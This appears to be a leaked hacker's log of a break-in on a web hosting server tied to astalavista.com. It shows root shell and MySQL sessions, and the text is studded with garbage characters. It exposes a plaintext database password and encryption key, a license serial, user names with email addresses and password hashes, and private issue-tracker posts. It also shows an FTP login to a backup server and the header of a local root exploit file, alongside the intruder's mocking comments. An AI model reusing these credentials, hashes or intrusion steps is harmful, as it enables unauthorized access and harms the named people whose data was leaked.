% ?- S/ K/ X! f( J0 H$conxHost = ‘localhost’; // MySQL hostname
1 p7 s L( i& A$conxUser = ‘hostinguser’; // MySQL user; j0 N$ }5 O. R/ O9 J
$conxPassword = ‘cXvB3981′; // MySQL password
$ {- m! h# u% j! p+ y$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
. o. O- ~# Y' N& @( e?>
- `; K& g3 l* s" c' @
: o, C, f& {$ z( U" Esh-3.2# cd ..; y0 A; h# F3 b S! f
sh-3.2# cd com
2 t, F! ~: P4 X; C/ k# I, Ush-3.2# ls -la8 z+ J4 v7 R: Q/ J a/ T2 }/ \
total 141208
3 N. @% u S$ W: adrwx–x–x 10 com com 4096 Apr 28 12:40 .# Z1 h1 O/ |, t, y3 e( M
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
1 o+ v$ X' n9 I* {! a; Hdrwx—— 2 com com 4096 Jun 4 04:04 backups6 t$ M. c. v; I5 B# \
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
j0 N. ?1 A, ydrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system* M! D5 i, Q5 _5 x, N+ r3 n$ T6 w
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
) g' U! L4 ^- b, ^0 L6 b-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout4 H: k* K( t- U1 _
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
/ a7 U! I% [; g3 K% d-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc5 e$ k# ?% i; Y
drwx–x–x 3 com com 4096 Jan 29 2008 domains
% t! E( `# a) h" [-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
4 c+ H- f/ y% s0 gdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
' _ T8 t/ ~3 v-rw——- 1 com com 69 Nov 18 2008 .lesshst
& a* p4 q& x1 H5 P8 zdrwx—— 2 com com 4096 Sep 24 2007 mail
/ W1 }3 X% ]; t4 r5 j-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
# X# p T2 N7 ~, Z9 O* j/ l0 xdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp; M6 q: Q" L' `
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html3 n+ e; Y% U" ^2 ~( w- T! O
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow+ a' @; T6 k: D6 v
drwx—— 2 com com 4096 Aug 26 2008 .ssh
, j2 N5 X0 z0 `# m+ a-rwx—— 1 com com 8515 Feb 10 2008 t& k/ _2 O) b$ E4 \* R
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c0 O' E+ Z3 `' s" M5 H2 B$ q, O
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
S" y, q8 |) U/ q" n5 `* I-rw-rw-r– 1 com com 617 May 20 2008 .toprc) G/ A4 j6 ^9 [) Q# N+ ]9 e
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql6 A2 z# g+ k6 l
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo9 S* C" B1 e! d; I7 ~2 K/ q- r W
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
) Q( m t. }) Y( Q
* D% H4 m) g0 ~sh-3.2# head t.c# w0 B" g/ z* K# N! y
/*
5 J; h1 y1 v+ f7 `* ?* jessica_biel_naked_in_my_bed.c
- {" C0 Q# l( N% D2 q*7 L( e& F' x1 A3 j9 x
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
r$ I. p, l& g4 L3 I* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
8 l+ ?' u' {; B! n& W- A# h* Stejnak je to stare jak cyp a aj jakesyk rozbite.
# T. x: ~& A* r, w8 P# P*
% ?* Z' A+ m4 S# V" C* }* Linux vmsplice Local Root Exploit% `6 A; k) x- ]" x" m2 e
* By qaaz
+ v; f1 T" Y: g- S*
/ N/ z, p) J, e9 Y3 `: z
[* Y% i* ~, N& J- ssh-3.2# cd /1 x2 m* w% ?! N" l! Q" q% o
sh-3.2# ls -la
' U0 K' c8 [0 {7 ftotal 3602 ]" R" \; n, ?
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
& E4 W, F6 \) N" M9 Z- c( _0 Wdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
0 ~& L- S9 U# F6 O-rw——- 1 root root 10240 Jun 3 02:39 aquota.group7 w$ v5 r& c$ b5 p1 q
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
4 {+ j# D0 D+ D2 Z, W-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db* [/ W4 G j. S5 v
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck) [- G- H$ C( h, h( u1 C: j/ P
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
/ {! X o! H; ^ C( Udrwxr-xr-x 3 root root 4096 Dec 29 2007 backup- ]+ {# p/ d! {1 R9 j6 f
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin3 y5 L) q* T2 U! a& q" i) d
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot8 Q' q [2 y% z
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
2 t5 r4 e- h3 e) ?3 W$ P& p; gdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc5 u+ c! _/ t) L/ m
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home1 ?' O( D$ C& N& i: J
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
; Z6 M2 w, S8 t# \drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib/ n4 v+ \7 {5 m2 u
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64. o) u7 E9 s2 j6 Q
drwx—— 2 root root 16384 Sep 11 2007 lost+found
1 E) A6 K$ ^1 [; |* T2 M8 Edrwxr-xr-x 2 root root 4096 Mar 11 17:56 media( M1 D# Z- x8 s5 K* h! V4 Y; q; D
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc3 R* T% @: y- _! E; q( }
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt+ w2 q6 M5 I! y6 j9 c
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg% q) L8 v6 D* _
drwxr-xr-x 2 root root 0 Jun 3 02:43 net
N9 u; T! l, R2 Mdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
9 x3 e, G% ?3 C) @! Pdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
/ y( `5 I1 N9 Y: o8 b" F; Hdrwxr-x— 15 root root 4096 Jun 4 08:40 root
& |7 b: H$ z X Odrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
9 l6 s! J+ C$ ^: T' \0 H% R# Pdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux$ A3 T" B* o1 L' M( k# V4 i* k: U
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
" l {8 I. t" ]4 Y2 _: b( k6 Ddrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
# M& y# Q# K2 @% g7 Fdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
& b9 s1 |: v; kdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr: I0 M( x2 N9 V( D4 i/ n
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var
5 T; a, p$ } o1 [( v0 V
0 A. `5 L0 g& M* }8 Xsh-3.2# cd opt
) p q) ^ E( @% Q; @9 p' D: gsh-3.2# ls -la
2 X, |% x& \4 \" I9 _7 Ptotal 20 ~; p5 W9 O6 K, `
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .! ]9 @3 G6 I+ L5 D- K d: k" ?
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
& c; j6 h( r5 l0 d2 o5 fdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws* t# I4 v- F v+ ]) h A! f
0 n# i: p0 F8 E$ d7 _
sh-3.2# cd lsws/
' _% U p8 j( e8 `: C7 Lsh-3.2# ls -la
$ y5 ^$ A4 t; g1 a/ X* t4 Z# Etotal 1087 W3 H0 H9 k K- V+ q
drwxr-xr-x 15 root root 4096 Mar 20 2008 .+ c" G2 A7 [$ F# X4 v' z7 G) J4 h. D, ~
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
, G! d, k7 m6 N0 K: _drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons# a+ C$ @# R Z' @/ @
drwxr-xr-x 13 root root 4096 May 29 15:10 admin
+ A- Y1 N/ ?* rdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
. z. X- M1 n7 r7 ~ v% Sdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
! `5 P* y3 b5 V, ]3 X9 [drwx—— 4 apache apache 4096 Jun 3 02:43 conf
$ V# B' }5 n) udrwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT$ t) I) ~' S) Q
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
7 Z3 E/ X- P( D3 Adrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin0 ^' p& a9 e7 p5 i- b" o
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
9 w8 g- s* i- S. c, J3 B( G/ J( \' |-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE: n; A$ j, m( K, |+ @8 q K
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP2 l7 I0 \# h- J6 G% P
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
6 Z* N5 C& s" |8 M A7 O0 q& U-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP) x+ F6 U" ?- d9 J' p, R
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
# t* }6 V6 e5 i1 Udrwxr-xr-x 2 root root 4096 Mar 20 2008 php
. ?8 A4 r# u! tdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild2 y+ R: A( b2 c# ?# ?
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
: I9 Z3 b9 P. R0 y5 e5 T, Z-rw-r–r– 1 root root 6 May 29 15:10 VERSION
0 i" O- e: b9 H3 N( G' d3 N- w# W2 o) G9 Y! c4 v# M0 O1 `
sh-3.2# cd conf6 y) @( ~# ^0 _+ T: X3 j
sh-3.2# ls -la" A8 J/ @! s2 [% f
total 48
* L( h4 ~ Z) `$ c* D1 {# V- Q! Adrwx—— 4 apache apache 4096 Jun 3 02:43 .5 M1 i1 l' }1 b8 r) `4 K
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..
9 x( C, N, p7 j2 rdrwx—— 2 apache apache 4096 Mar 20 2008 cert
i; ]% D! k! }6 ~( x, T* B-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml/ G% p" n- f6 n/ \* Q7 q( N3 [
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
* A5 _9 M# ~6 ?-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
5 w! d3 r) R6 q+ X3 E-rw——- 1 apache apache 256 May 29 15:10 license.key
/ G9 d/ p( n! t# L: o) K3 h% X-rw——- 1 apache apache 256 Mar 21 2008 license.key.old# Y) ~3 E) _. l0 \/ [9 D
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
" o; w0 r! n h# H# t. j-rw——- 1 apache apache 20 May 29 15:10 serial.no
u, Y1 z$ B" ]& J- w) [drwx—— 2 apache apache 4096 Mar 20 2008 templates
1 q' s1 m' `8 Z% o! o: Y
, A4 f' `* p: m3 Q2 F5 s( W% C" ] Ksh-3.2# cat serial.no
, k, p% X0 y9 BIbDl-oVsO-CKqL-wVRa
: _' ~, p; B; y- l! \4 j. ^5 ]( H
# V5 S a4 p2 M- o7 wsh-3.2# mysql
5 U- I4 t5 d$ i; w3 z7 kWelcome to the MySQL monitor. Commands end with ; or \g.
7 \3 G/ s# |4 ^5 V, HYour MySQL connection id is 286844- T& d3 n7 r( ], y1 v
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
! v) K4 B' g! ?# b, y& @/ r2 O0 y) Y, F' d! @4 {
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.0 @8 f Z$ I4 k; r" |: F& {
- }& k8 u. t ^7 q- P$ F5 {( Zmysql> show databases;
" J+ l% `1 I( Q, R+ c3 c+———————–+
- R' L! C) G0 ~) u8 r6 ~2 {' @| Database |% f, X/ \' T i& \! n4 d- v( e
+———————–+
5 G+ U; o; M. Y/ ]% O| information_schema |- X4 j: ^' O6 `$ B5 B
| astanet_ads |0 X4 k- ]! n# e
| astanet_mailing_lists |
# i2 W2 j3 ]4 C+ \2 G| astanet_mediawiki |2 g p/ F- y/ M+ E, a
| astanet_membersystem |
2 h% \, ]3 t; _| com_contrexx |8 d3 k7 r; d& j! W% }
| com_contrexx2 |
3 I; J$ r G7 `# u3 L# c| com_contrexx2_live |
9 p' @8 G. P1 T+ h/ y9 `) V4 B| da_roundcube |; X" L5 ?( D. |: l, u
| dolphin |
. G* J" j4 }1 L/ C/ J7 l; k| ideapool |
4 r$ ~$ v3 E2 h, I| mysql |, e$ j" J4 F# S7 J( V6 L6 m
| test |
+ O. ?( k3 p! d, p1 a& a! w% r| yourmaster |/ q2 t; e+ I; I0 n( }
+———————–+' q6 }1 S6 \. R$ r- a. Z7 S
14 rows in set (0.00 sec)4 ?! C: t2 V% f6 w3 I3 I: ?, l, a
% o1 b! [! N9 D q* c
mysql> use ideapool
7 [+ [! s2 B& I, `/ O5 d3 QDatabase changed# j4 _) T7 x1 ]0 X* w
mysql> show tables;
' o+ d0 y3 {+ J$ x4 h- F+———————————–+, A3 D, U& W; |' V. _; a
| Tables_in_ideapool |
* f' c& K0 x0 v* ~: ?0 R4 I4 R f+———————————–+% ^6 L- E* U8 n
| eventum_columns_to_display |
8 Y T% N+ F' Z; l( a$ h| eventum_custom_field |
" u/ g7 Y/ M! Y- {* @5 {" q' R| eventum_custom_field_option |4 @6 W, b* Y# @! l: c
| eventum_custom_filter |
: Y, H+ m/ u8 G1 D: g| eventum_customer_account_manager |
* S5 @+ B, n- U! t" T| eventum_customer_note |. I H+ l0 `% y
| eventum_email_account |
5 i! I9 U, v0 V: \| eventum_email_draft |
% m1 d, i7 G' {: ?5 j, o6 H| eventum_email_draft_recipient |
7 w+ W8 s$ C' R; Y" V| eventum_email_response |
* ]7 A( u- Z! H' i; w| eventum_faq |
7 Y7 V: p. p, r- m& r: D9 m| eventum_faq_support_level |
! `9 j6 G3 J$ V4 W| eventum_group |
( O1 r/ T' V V" `6 w `| eventum_history_type |: u3 x3 W n0 {
| eventum_irc_notice |/ k j8 I# u r' o# S% p
| eventum_issue |
. G! V' Y1 |" q( h F1 M# G7 B3 l| eventum_issue_association |
5 r6 S; Q3 r( Q| eventum_issue_attachment |
. d5 S; K/ _/ B& S| eventum_issue_attachment_file |
( L, L# K8 Z+ J* l| eventum_issue_checkin |, H2 \. ^+ D6 _
| eventum_issue_custom_field |
' }# X) _+ |8 S8 m) M4 `| eventum_issue_history |
7 |0 @2 d- U( B8 v, N; x| eventum_issue_quarantine |
' f( p% m& y& z, Q| eventum_issue_requirement |
& A$ ?% t$ D3 P) Q| eventum_issue_user |1 R9 @3 r2 j! O5 A# J8 N; A5 {( [
| eventum_issue_user_replier |
# Z; U) N' d1 o2 _| eventum_link_filter |; x5 ?; V3 ?+ g) {) [# X1 y' e
| eventum_mail_queue | N! X( B0 L3 u5 J" `+ S7 H
| eventum_mail_queue_log |
k# ~ N) v% @1 C+ ^8 f; D| eventum_news |* e, I$ {/ m# x
| eventum_note |8 C9 P( l! g# t: y/ t
| eventum_phone_support |
2 s+ L2 |9 U. b/ R* g- x| eventum_project |$ H! S- e# X/ ~( U
| eventum_project_category |+ q: t/ j# ]+ C! n( x# y
| eventum_project_custom_field |' \% x1 e* E3 W3 \* d) q- \* O
| eventum_project_email_response |1 E1 ~! a; ?$ k, p
| eventum_project_field_display |3 k, L/ p; q3 b1 N( k/ ~
| eventum_project_group |
; y/ u4 Q8 U5 N- Q3 l| eventum_project_link_filter |
" s4 O5 D1 L9 E4 s2 f| eventum_project_news |( A2 l" F# I5 s$ g3 v& m
| eventum_project_phone_category |
7 q1 J8 b' n8 C/ f1 D+ I C- ~| eventum_project_priority |
. T5 E3 s0 D9 ], h. || eventum_project_release |
% J* b2 m$ z- b7 S$ `| eventum_project_round_robin |
/ S- k" i; ^8 B# P3 w| eventum_project_status |
l2 N+ Z8 S6 Q; y8 K, d. q| eventum_project_status_date |: b4 J5 b9 m& x' F' M
| eventum_project_user |, M& X/ z& `1 w5 C# _5 L
| eventum_reminder_action |* ` i! o3 R) C0 a& P9 u. T8 E6 e
| eventum_reminder_action_list |
9 d" w) v9 Q W7 Y5 W& T| eventum_reminder_action_type |
$ t! x$ ^% D9 Y) ?& |4 _| eventum_reminder_field |
$ }- N. v" d% z" _1 }( k| eventum_reminder_history |9 @) [) h# a2 X) h; C7 j- B9 s
| eventum_reminder_level |/ S- B/ r9 Y, Q `. ^
| eventum_reminder_level_condition |( Y: x5 @6 Z! H8 @0 [/ _; m" W
| eventum_reminder_operator |
9 j+ N1 N2 S" I5 Q/ g| eventum_reminder_priority |
% I! C/ t' e9 x, D' H| eventum_reminder_requirement |+ P* w, B9 L9 r
| eventum_reminder_triggered_action |
( V! U+ Z. k& Y. g. o| eventum_resolution |
/ x. j y/ o0 f( i5 P N4 U- D- L| eventum_round_robin_user |
G/ Q1 [" {( p$ ~8 V: [| eventum_search_profile |7 N, v! ^$ S5 m6 G' b
| eventum_status |* t$ z7 s, F; u' z
| eventum_subscription |
3 J# E3 P( @1 n| eventum_subscription_type |7 z1 `+ F7 D0 X! H! {6 ~
| eventum_support_email |; Z9 @" Z9 `; K- x0 l
| eventum_support_email_body |
. ~ g# I$ ?% z2 b| eventum_time_tracking |5 F! s2 r: v1 j9 ^4 H& b' f
| eventum_time_tracking_category |+ U3 f- `9 E8 n8 r+ s" v* U% a
| eventum_user |7 n: z$ N: D( R# H
+———————————–+
) H8 g9 U1 `/ b3 o5 Q2 X ^4 s8 Y, ?69 rows in set (0.00 sec)5 L0 p6 j0 h. |- C% v
; T+ K: {# e% ~ _# d
mysql> describe eventum_user;
$ F( b- j/ P) t3 F. R# `" u: N+————————-+——————+——+—–+———————+—————-+' S6 T) X2 s) H' n
| Field | Type | Null | Key | Default | Extra |% `* {) R! E2 |4 {
+————————-+——————+——+—–+———————+—————-+
7 M) X) Q2 l& @8 `3 k7 ` x| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |4 b( ?3 Y+ }7 Y. I
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |' A) s' W% v$ r0 @( `, X S0 P
| usr_customer_id | int(11) unsigned | YES | | NULL | |. p" d R6 L" _3 w* ~3 U8 a
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
; u# G. G$ X/ Q3 |& i# i f| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |6 Q7 f( [8 d+ J3 ?' K/ \# \
| usr_status | varchar(8) | NO | | active | |0 q* K, A2 n8 N6 A$ Y
| usr_password | varchar(32) | NO | | | |
3 |9 o0 T$ Q2 y. F, {| usr_full_name | varchar(255) | NO | | | |4 v' [1 W! W: |, F/ d
| usr_email | varchar(255) | NO | UNI | | |
- s4 F# k: I: ]2 ]| usr_preferences | longtext | YES | | NULL | |
5 v1 e$ _3 m# g) T| usr_sms_email | varchar(255) | YES | | NULL | |
! }' a/ F8 N; g# K& C* V| usr_clocked_in | tinyint(1) | YES | | 0 | |* O8 S. e$ K% l9 n7 ], t& m [
| usr_lang | varchar(5) | YES | | NULL | |
1 P. k6 c& R+ c4 w+ ?* C0 P+————————-+——————+——+—–+———————+—————-+( S5 H; m! A# d
13 rows in set (0.00 sec), _/ M; d' k9 M! U1 O6 ~- c
2 [, f: |- z0 p8 rmysql> select usr_full_name,usr_email,usr_password from eventum_user;; D; r7 {: O& ^; o7 F+ t* w
+———————-+——————————-+———————————-+
7 U5 ~4 _1 T' X8 Q6 R" T| usr_full_name | usr_email | usr_password |; `" g6 ~7 g, ^9 g* N9 A9 e* V
+———————-+——————————-+———————————-+
9 b& {/ W8 y$ b k" @5 Q| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
# }. d% O, y! ?6 ?7 t| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |* f* o/ |* b) T$ B, Q
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |: ] C& I; L+ o+ \
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
) A: |5 s$ K, i t| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |0 e: R3 P/ ?3 S" y n
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |+ T# S! D- c" ^
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
! d7 c! p- v, v a8 }6 l) ~| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |" [! J6 P$ S ?0 Y
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |1 i+ a) F2 {8 f
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |* L' {( {1 V* H) x
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
* @ F& I7 r8 t, k/ G# x| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |. N/ k- z# Y, }2 H9 @* W
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
* ]* ?+ K: m4 i T: ]| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
2 L n* n8 c( N( q- k" D) M| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |* W) n& w3 n( e" t& X, s7 U6 P
+———————-+——————————-+———————————-+
+ n D" P' T9 v/ \15 rows in set (0.00 sec)0 |+ n* _$ f9 W: Z4 O
4 G/ \- G0 }' N: E5 t' \& Z
mysql> select iss_description from eventum_issue where iss_id = 43;
1 _2 K$ ^0 z6 j4 z+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+$ r0 O( J9 {' g- f
| iss_description 7 r$ Y" H7 R( H" Y% I2 ?
|0 `% V* n- k* Z, K' f
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+$ s0 C G8 z0 W
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be* D6 _1 t3 Z& I( a3 o7 J
connected for 90 mins… 120mins… so what i propose is something like:7 K5 W! ^$ a& q
链接标记[url]http://www.surfthechannel.com/[/url]
- |2 A# W G6 k% K4 }since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
6 t. @' u- K' S, tlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t" T/ ?! D T7 H w# ?; d* n
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
6 W V% W9 W* ]* I3 J; i/ n* o( dif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…3 X) h+ H5 q: D% |
+ ^! H/ P( ~/ j
We could also put advertisement during play on the flash video player itself… extra $$…! ^3 y2 o5 j# ]" M; b& u' K/ R
9 [4 J% z. B6 M) K- E( b' d, J; Y
By sykadul |
e0 M5 p1 n8 j/ Y/ J4 Y+ [+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+9 W+ f6 \- @% Q5 g/ ~4 V7 H
1 row in set (0.00 sec)9 a, ~5 k" x9 i! s7 m8 |$ C
2 M% n0 c1 d; e. [- O// Money and extra $$ is all they care about. remember that.2 `+ U. d4 z! ^- [& H$ `: U
5 N9 z$ M1 }5 R9 y6 k% o1 I
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
Q+ Y& t4 Q) b# Q* h: K3 y. C+————————+——————————————————————————————————————————————————————————————————————————————-+
% ^& U% Y) p, ?* }| iss_summary | iss_description ( S9 U& [* j) C$ _, M( ^
|
2 A/ S$ m H4 ~# W! [+————————+——————————————————————————————————————————————————————————————————————————————-+! G; A: n5 s4 @9 V+ G( `3 |
| Forum for REAL EXPERTS | Hello,
/ ] C) S# ~- D4 O( a
+ z8 c* ?- c2 q; S) m4 nIshtus and I,
1 x7 r: Y' }% x6 i9 y) `# {7 w% F3 N, L; d! i/ S
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
9 K4 e) ~- ]& OONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..* u0 M. X7 v% D6 h/ v/ \ ?
% a1 h' w) t6 e; b8 e' I- Q0 cOne example a friend of mine from coresecurity.com!) t/ S1 k6 B, Y/ j4 l7 g$ h
+ P- a/ Z! j; Z( ~/ e
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..- d5 V% m: ]! W0 W% ^
( W4 C, u# t& N4 E# O
|+ s! c- u- A* s2 K2 Z
+————————+——————————————————————————————————————————————————————————————————————————————+
6 y, J8 L9 K. d9 d4 ?& [# K2 ]% Z1 row in set (0.00 sec)+ \# S& W6 |* d ]; {; j
u# z8 ~; i2 i+ V9 Q1 M2 j// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…8 K8 Z2 H5 {3 W( K2 w7 |( d5 n$ m
) C. w' i4 Y& H/ s9 O3 ^
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
8 G) W, L* ]& ~- \; M; h+——————+———————————————————————————————+; }( R4 U6 ]1 M& I6 s/ X& L
| iss_summary | iss_description |! P" R7 Y0 Y, u- E
+——————+———————————————————————————————+; j0 x& J' t3 B
| Website guidance | Virtual Girl which guides you trought the website.
5 k1 L4 J8 S6 H7 _8 q" ^( i9 a- ?+ q
We need a girl with who you can ( talk )!!!- {% C) p* ~4 n( ]( Z
Also for the News!. z' i ?% T! M3 ~& T. F* F
So my suggestion is a girl who read you the news loud if you like!$ B9 u& ~& g0 c
you can choose between read yourselfe or she read it for you or both!
& P W/ u4 w* ^% l9 K7 d+ N9 v; K: S/ g( E( `1 z
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
7 Q! a' d; x0 u' Y
. P4 d+ g+ @) \" f7 y" t: SHave a look on the example girls!!
?" J" O5 W, H& f$ \& n
9 t, t: E. E8 |5 F链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url], P/ I9 A5 C( ~# t2 w3 C' u
% ^0 W( J6 d- m$ w/ e
or that ]' L( z& W8 P+ r+ ^0 t
: g2 o1 Y" P1 h; V R. R链接标记[url]http://www.yellostrom.de/[/url]8 ^' I! b! E# K- U$ J. e
0 O0 K \1 U! h3 h. N! ?/ I, L|" c3 n- ?# o0 G8 l
+——————+———————————————————————————————+- h' }' t( C; A# E
1 row in set (0.00 sec)
( t6 @2 `* n: }1 r- `$ f* X
/ z ^/ z, N; m" v0 U// ha ha.
5 w7 N# H8 q( O
0 f- ~! f' G& R: {2 V, Dmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;7 i% H. s9 H( @# O' i: F# G* _
+————————–+———————————————————————————————————–+' z& t# i5 A, G0 M: {: o; d
| iss_summary | iss_description |
$ T" N1 [% e& a5 ]+————————–+———————————————————————————————————–+8 P. d8 Q/ p/ }9 ]' O. Q, G
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
& W$ i, A% j9 ]/ d0 A+————————–+———————————————————————————————————–+
0 \3 V& Q9 C, ~- S1 row in set (0.00 sec)' c8 G# s/ F9 ~; ^5 D! V7 W6 F7 ^
. o) J1 }7 q; j! o5 p& w& L
// LOL.- f6 @( h' S$ @! m0 a T1 l: G# \
& J1 v* Z$ H3 ]& D
mysql> exit
, V0 [; M% x4 @- i8 H& b) lBye6 d m k0 A' e, y- R& g
B8 F- U+ l; h3 P9 A/ @1 jsh-3.2# ftp 212.254.194.163, T2 ?* k. e( k9 p* }
Connected to 212.254.194.163.( R" l" x& P, s2 h7 k5 p) x
220 BackupCOM_VW FTP server ready.
& @9 A2 [, b+ A' m504 AUTH: security mechanism ‘GSSAPI’ not supported.
; \* p* G- E, x ]2 p1 Y504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
- X0 f. }' @# i6 N! J6 NKERBEROS_V4 rejected as an authentication type
3 }# @) ]+ m' T0 i" S HName (212.254.194.163:root): astalavista.com% E' r. `4 w/ M3 r" M" \
331 Password required for astalavista.com.
1 E! M9 O: j( O* Y( xPassword:
% n% _! `& P4 w4 K5 c230 User astalavista.com logged in.
4 E; N, C w5 K N1 ORemote system type is UNIX.' I; {9 y" p- `7 U
Using binary mode to transfer files.4 A; |& j: p* P9 _0 ]; Y
ftp> ls -la
6 T$ N1 K8 J2 o6 h* o227 Entering Passive Mode (212,254,194,163,2,188)
9 {' _) `: U2 e. o3 r150 Opening BINARY mode data connection for ‘file list’.
! k% _2 w- T; a. k Gdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
* L4 c4 s' g7 ?+ b3 \2 h' R2 |& O226 Transfer complete.
